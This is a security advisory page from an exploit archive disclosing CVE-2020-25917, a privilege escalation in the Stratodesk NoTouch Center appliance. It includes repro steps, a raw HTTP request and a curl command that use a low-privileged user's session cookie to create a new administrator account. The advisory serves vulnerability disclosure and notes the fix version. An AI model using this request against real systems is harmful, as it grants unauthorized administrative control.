exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Stratodesk NoTouch Center Privilege Escalation

Stratodesk NoTouch Center Privilege Escalation
Posted Dec 21, 2020
Authored by Jeremy Brown

Stratodesk NoTouch Center virtual appliance suffers from a privilege escalation vulnerability. This was addressed in version 4.4.68.

tags | exploit
advisories | CVE-2020-25917
SHA-256 | bc1e49f9a8def3aa6ccdabef93414743d37482014f5ffd7cf5069cef8ed88f82

Stratodesk NoTouch Center Privilege Escalation

Change Mirror Download
Stratodesk NoTouch Center Virtual Appliance is a portal for managing NoTouch clients. It appears that Stratodesk has a partnership with ViewSonic and produced these appliances to support some of their hardware devices as well.

- https://www.stratodesk.com/products/notouch-desktop/virtual-appliance/
- https://www.viewsonic.com/eu/products/desktop-virtualization/SC-T25.php

=Authenticated privilege escalation from low privileged user to admin=

The user management security strategy seems to be just hiding the options in the Web UI from unprivileged users, but they can still call admin-related functions manually. Many different admin requests are available to be called by non-admin users with the root cause being the same. The add user functionality is just the biggest impact demonstration of this issue.

A low privileged user on the platform, for example a user with “helpdesk” privileges (which is level 4 in their system of 1-4 privilege levels with 1=admin), can perform privileged operations including adding a new administrator to the platform.

Repro

1) Create a low privileged user
2) Login as such user and capture this user’s JSESSIONID in the Cookie header
3) Insert your ID in the below request where the JESSIONID data is
4) Login as admin2 and see that you now have admin privileges

POST /easyadmin/user/submitCreateTCUser.do HTTP/1.1
Host: stratodesk-server
Content-Type: application/x-www-form-urlencoded
Content-Length: XX
Cookie: JSESSIONID=[XXXXXXXX...]

func=save&userid=0&name=admin2&fullname=admin2&password=Secret2&seclevel=1

"As cURL command"

curl -i -s -k -X $'POST' \
-H $'Host: stratodesk-server' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: XX' -H $'Cookie: JSESSIONID=XXXXXXXX...' \
-b $'JSESSIONID=XXXXXXXX...' \
--data-binary $'func=save&userid=0&name=admin2&fullname=admin22&password=Secret222&seclevel=1' \
$'https://stratodesk-server/easyadmin/user/submitCreateTCUser.do'

Remediation

Fixed in NoTouch package v4.4.68 (unclear which if any OVA releases contain the updated packages)

CVE-2020-25917

Discovered and disclosed by Jeremy Brown / December 2020
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close